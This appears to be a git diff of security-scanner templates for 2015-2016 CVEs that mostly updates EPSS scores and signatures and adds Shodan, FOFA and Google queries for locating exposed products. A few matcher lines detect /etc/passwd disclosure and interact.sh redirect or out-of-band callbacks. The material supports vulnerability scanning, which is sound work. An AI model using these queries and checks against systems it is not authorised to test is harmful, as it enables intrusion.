b/http/cves/2015/CVE-2015-4632.yaml index 736b7ef8af..407f940693 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: koha product: koha + shodan-query: cpe:"cpe:2.3:a:koha:koha" tags: cve2015,cve,lfi,edb,koha http: @@ -43,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b05f415f11986e6b3ad650b585140749b2b8035d73f2931f6e78f4c5f6f5232b02203a635de3c9935dc598ec196c69eb432a53de2c3b9891cb839d776160f1d0fdf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac8404c129a23234cc232fc82c4a72092885e1a6beb927ec0013b546a0493efe02204382b75d9ad57c13691d86c89e4f7862f9ace0967a14b88e7c0fe98dd60f7fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 30e491e3ac..a2c129b6b9 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.02372 - epss-percentile: 0.89592 + epss-percentile: 0.89823 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201a7b1f661191d5cf0cd3b6698c57549de62930e8b8b37f08e83b34383402682302202a841a227aba2b9fd4c73cf72d41a36ca80ce54068a4ff45c65ea18ea873b68e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index cb04dbfe5c..f36d3bc2fe 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.73024 + epss-percentile: 0.73425 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4ef8441c6c0d53daadd541f0f21fab47fc4d77af6b930222621893db4913d940221008d246cc60163a5cf4f2bbc7bff089883b2b86e6c275b970bfd4654bad39d9194:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index fff5f19692..bb8fba9680 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88593 + epss-percentile: 0.89683 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220207ba0410481b90cdbf301df5d34518b015c8ec9366803c31be44661113a9e01022044ad895219f4df49dc7037ad7b8420987cde05403fb36fe58603419476a063b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0496c4fd3aca32d1a2d8344ea8556de9f811cc86996acd4e61d9751af0339fd022100addd126b0e674d7b130b42aa93991ee8b4cf9f989dcf57581901e4ae8c8856cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 23b34974f9..d6232d2b3c 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.77025 + epss-percentile: 0.77434 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502202859b878c456815dc2de4f34ef7ce4fbb5ce6868f17e145a47e5df1cf4a008df022100e1c8f735f6d9f14d8b5ba3d296c48f6b74d7152c59bc4eee04a4f4ee38ea61b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b358a0733787a256d88b76615b87f1297c9438ed3ecb830ab1b792c58a1a954f022100b5fe98f745bc4c696d72f1499e5abb9ee02828c45f878a8d5ff4210f97726828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 7fd1a2a4de..2c756832d1 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - epss-score: 0.02176 - epss-percentile: 0.88248 + epss-score: 0.01853 + epss-percentile: 0.88325 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ff5f92a49920cd8381ad88a3856050db835c74ab7946be53e0a1a413f0b190290220332d02cd0e4a2dd43ebccfbf82bba432e28fe572daf36a85f1ef7e36420aa6c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022048cc4fa7612874c6f9e2d48af2bf0575e181a9c5eb92cf2fa06306b7c7456642022100ef4e98f54c19b8e110e0db69c9ddf3079244a53f0bb75c5d0b24394258071e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 039fd0a3d6..cfd4bf8191 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 - epss-score: 0.10406 - epss-percentile: 0.94855 + epss-score: 0.14014 + epss-percentile: 0.95676 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cd291f5c987553fe7226cae955afcf8510a3d8336df8bd95ef30fd3b37acd6202210087d411bcb4248de1f5e045aa50a4ca6aee4f54950d3be9be44c2d64bd8b69287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201bdf38a3e9f23744d2a793a19f5fdeadd16297d031cbfe68b899cb9960bc9730022100bd87559c0a83dbe87b065f7f381c804560fc2a151ebde23a9a969442df5bedcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 0fcc460443..d3859d8226 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 - epss-percentile: 0.99783 + epss-percentile: 0.99802 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive http: @@ -68,4 +69,4 @@ http: - type: status status: - 400 -# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3a9f2d041f2e75dd77d111180e573fa77581d495321d5b602b710375e9bab5802204832764c446a039e3d1b93621dab1eb423fe570fc6c226804f3c05bd6bd7b558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index e6e306178d..54e545481e 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.84665 + epss-percentile: 0.86101 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205488f218bf2c3c7f54b39eb4a23b2b8168ef4c98f3be02378805ef5f6d92965c022100a55527149f23f2bf1990d33ec040e1260b8a1583966e4680161b9a31a65e5d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc89b026ca87cf13ed22d0c5f83b0877852bdffbcfced68e49ece56ac50a6c3d02210081447372c99d6593cace00c9ff9ced844310b75f90b508d792f5ab2e90785dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index dd3b643cd6..aa7948a5d4 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -21,12 +21,11 @@ info: epss-percentile: 0.52637 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: sourceafrica_project + max-request: 2 + vendor: "sourceafrica_project" product: sourceafrica framework: wordpress tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project - flow: http(1) && http(2) http: @@ -63,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009cba36ff243cc2b1d9c4a151b396958b4caf82584c82cf9f9e9b6892d403cf6c022018312ae7e0cb0e95f6fbd1cb4d1062102feb8dfab9b1cf125d3da648ffdde45f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220679e230959445da2c5b25e9a11a7d1a88cb0720728a47b5efe39d7da17a0a141022011ad48075504ec6966d82627ca3f218ffe9c18eb1978544468361e40b1f43cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 4bb280a998..b6c1463df4 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - epss-score: 0.96881 - epss-percentile: 0.99685 + epss-score: 0.96378 + epss-percentile: 0.99562 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008bab1004e34f044c74689230de8f4d39ef776246196710ce3b9dc0485bb7b65022100a1b73bfc5f2610fc20d5b2d111a819fb675d8fc62d9c3411507de1aa1cbafe8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 66e1e5cc4e..716d3005f0 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -20,13 +20,18 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7297 cwe-id: CWE-89 - epss-score: 0.97564 - epss-percentile: 0.99999 + epss-score: 0.97553 + epss-percentile: 0.99997 cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" tags: cve2015,cve,packetstorm,joomla,sqli variables: num: "999999999" @@ -41,4 +46,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100a76121fd34a701a623fe02d8de446a12a363ff654c9fa1639ad529008c43117a022100e533be8c3fc95b05cc0cc6b3128a8fd970c943c5846fc163dc941f2849144f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a08577111f012e59c2108d9e51684c5329449907081587b4e4d76abd3406739022100dbd68ec0f6ae6c4a6f6109fd123ff073d882103a02608a2c05b2e034addebccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index aeb1876bf4..55746ed8e2 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.60606 + epss-percentile: 0.61233 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220751822cd9a64218d991be21596af65185eb0cb7a0ce6a8784d0b16b796f15a2d02204fc11d32d252a9e44ee7344d48136104c33912494230c2b75ff8a3c2229b7761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057ac21264c23de9dd6686f44744a59263f916311d44d55512d4a00d1a575799302204ffb90cb3c1c00d45cec8b57f7592fd62fa17665ec00217cdda0fba02c722464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 2691b887e5..f816d5909a 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -21,13 +21,16 @@ info: cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.97122 - epss-percentile: 0.99772 + epss-percentile: 0.99794 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibm product: tivoli_common_reporting - shodan-query: http.html:"IBM WebSphere Portal" + shodan-query: + - http.html:"IBM WebSphere Portal" + - http.html:"ibm websphere portal" + fofa-query: body="ibm websphere portal" tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev http: @@ -68,4 +71,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009586281cda8b6b30a3742d50ebc330263f55df7b891fd1d02ea189b267c2403a0221008e8594bba5c76926ba07e236387ab3d906309db88b0ed9431aa1489fbe1c40cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 7e072d80be..f1c51d813c 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.50407 + epss-percentile: 0.51315 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zohocorp product: manageengine_firewall_analyzer + shodan-query: http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: cve2015,cve,manageengine,edb,lfi,zohocorp http: @@ -51,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033310ce04e506b0032c6fb7238353cd6100a3065b45f93695cea8aa316876c630220603da199c7554c8cf879f5ebe7a88fbe5d407438fc5352e3673a1bf713b3685a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207194d253550542bd30658b6d67814f0dec74914b8d242d858c3a190ba89ddd220220690346796828449895bf7ee397e1db889b20c1341fe2d6114fd187007415a7a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 2d6874a424..b84e83e5c3 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -20,12 +20,17 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.61409 + epss-percentile: 0.6128 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kentico product: kentico_cms + shodan-query: + - cpe:"cpe:2.3:a:kentico:kentico_cms" + - http.title:"kentico database setup" + fofa-query: title="kentico database setup" + google-query: intitle:"kentico database setup" tags: cve2015,cve,kentico,redirect,packetstorm http: @@ -38,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a004830460221009e8f50b85daa26e3fc8e68ec98b52d6c22a387e1dfa6ab6e91be8ce1b8508ab3022100ade33462a8ca04ef6ae72e63331f1d1880a4ba45f2ea2180ff659181ccbb5b57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea91c0071f8a0ccc0191cd604f4d6f7fc61b3b716b520e545eab69d12cf5af35022022850efd8fbff62c81974d60b1378d7a9d74992f707a28553b8bbf97fb590ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 3d9d6e38f9..c16ee99210 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: atlassian product: confluence - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - cpe:"cpe:2.3:a:atlassian:confluence" + - http.component:"atlassian confluence" tags: cve2015,cve,edb,atlassian,confluence http: @@ -45,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea5b816fa70ecf0f1f6be7d3ede507c9fe4a29dae7445d2887f0f4c66bfa8ffa022100f1b0fa913988d0efc69fc8cd0c2779c5ceaf150bf72aa859b66c02efd8f96c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f50cefa6f24f4fb1f07b3b229fb698234043c337386cfe67f50d6a60d86ca6302200a267245e74b46efeccd471d30ecb8fe04ff0729b0fa3e31158b34c33e71d3ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index f3987bd59c..af8e7b3406 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.74145 + epss-percentile: 0.76541 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022050b2f2d4cb0362670660a3a3f24d8775d24b3371b3eac800eec120eca261c2a0022100e10e0949da402a2150d79e9c16d50a38e202ff6c8b4e3c1eecbd5789c9322910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206499e057c9d3a3e47b97921bc97140a1c6c2665c3f88b9aecdab84e783acc5a1022100f3638d8b005bcf951cc4bcef477dac5cf3438494276100d7cb26b6701140db28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 72bff270c2..162581dcbb 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -50,4 +50,4 @@ http: - 'contains(body_2, "([A-Za-z0-9]+)<\/span>' internal: true part: body -# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009528ca4f67e11fbcd8b18e6d2efb805ce25f9d0788175537480cb1bdab15695702203bcd33bb55f89932547aeddf042d65ba26776ced89eff267fb4f2424f2eec0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 8c3a189e04..19cf472b00 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -28,6 +28,7 @@ info: vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 + fofa-query: icon_hash=-1074357885 tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital http: @@ -44,4 +45,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220351cffb23009540be03abde85635acf590303ae2297d629b88db27a7d1d7cff802200127e1f9ffee3c57b152667745d8dce32de3fc3978f3831ddebe3b7809c8897b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index b08fbf231b..bc225fd45f 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -27,6 +27,15 @@ info: max-request: 1 vendor: zabbix product: zabbix + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" + google-query: intitle:"zabbix-server" tags: cve2016,cve,zabbix,sqli,vulhub http: @@ -46,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018a825747d78818fdb7ced045c8435e2c292a9e2c97b314289f989ec9b75c6f402202ccf2131d2cdb4eb4fba454e3c56c741f459f3545b3290c9e896aa9eeb47bf4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index c8b0252ad6..19d77f8567 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -28,7 +28,11 @@ info: max-request: 1 vendor: opsview product: opsview - shodan-query: title:"Opsview" + shodan-query: + - title:"Opsview" + - http.title:"opsview" + fofa-query: title="opsview" + google-query: intitle:"opsview" tags: cve2016,cve,opsview,lfi http: @@ -45,4 +49,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb94ed624af7fd26b76760fd08c8c10737f8720e2fe24c2f4a104ab3ee3e72020221008af112871203ce7327a44d125997b1d4d018d238a45bca135376b79ceac0e17e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index f9d85a4d80..c777e69f54 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: opsview product: opsview + shodan-query: http.title:"opsview" + fofa-query: title="opsview" + google-query: intitle:"opsview" tags: cve2016,cve,redirect,opsview,authenticated http: @@ -49,4 +52,4 @@ http: - type: status status: - 302 -# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100948052a5f3f4171269d27e8daf23f0aca9164b893bf2822e7c0d2db498ab1d39022100fe953696d9917f183fc424ce4c326a4de79ff5cd78483a6e718be65ce5da853d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 5edceadde7..c1ba89ba21 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -15,13 +15,14 @@ info: - https://www.exploit-db.com/exploits/39575 - https://nvd.nist.gov/vuln/detail/CVE-2016-10924 - https://wordpress.org/plugins/ebook-download/#developers + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 - epss-score: 0.01429 - epss-percentile: 0.85146 + epss-score: 0.01089 + epss-percentile: 0.84323 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035463ec47dab2e9697b6674a8af15173fe0695e388c6704ee510f3d410ef89e8022100ad37ebb93323af593940c5eece752836b5f4ca33475290dcf8601e11cfe00fd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085fc3986ae66d40990e4a31f02cda6025e0cf6c150b726abb5ee64d8b910edf6022030737c9f147c5262287ddeb3743d846c5b60018f119a3e2ca38e94b557e03376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index c9d3a43858..2a721c1141 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -14,13 +14,14 @@ info: - https://wpvulndb.com/vulnerabilities/8609 - https://wordpress.org/plugins/mail-masta/#developers - https://nvd.nist.gov/vuln/detail/CVE-2016-10956 + - https://github.com/p0dalirius/CVE-2016-10956-mail-masta classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 - epss-score: 0.01238 - epss-percentile: 0.83962 + epss-score: 0.01123 + epss-percentile: 0.84583 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -47,4 +48,4 @@ http: status: - 200 - 500 -# digest: 490a00463044022039d06d4aa7a538325a7def0732a690e76353bd439cec6d8585bccf59a180048002205b9232ef9dbcf11df674e2c295d9a64257cd54d42501c853019ff131e47e7741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220538fc9ea958512767f2d8fe5e57e99b3b4b808a9034b6cf8f3c478c6274aad010220449e8eb0d19a0ee9a4d3baa931168afff6b0a7b8460414d2689d358e61a2688f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 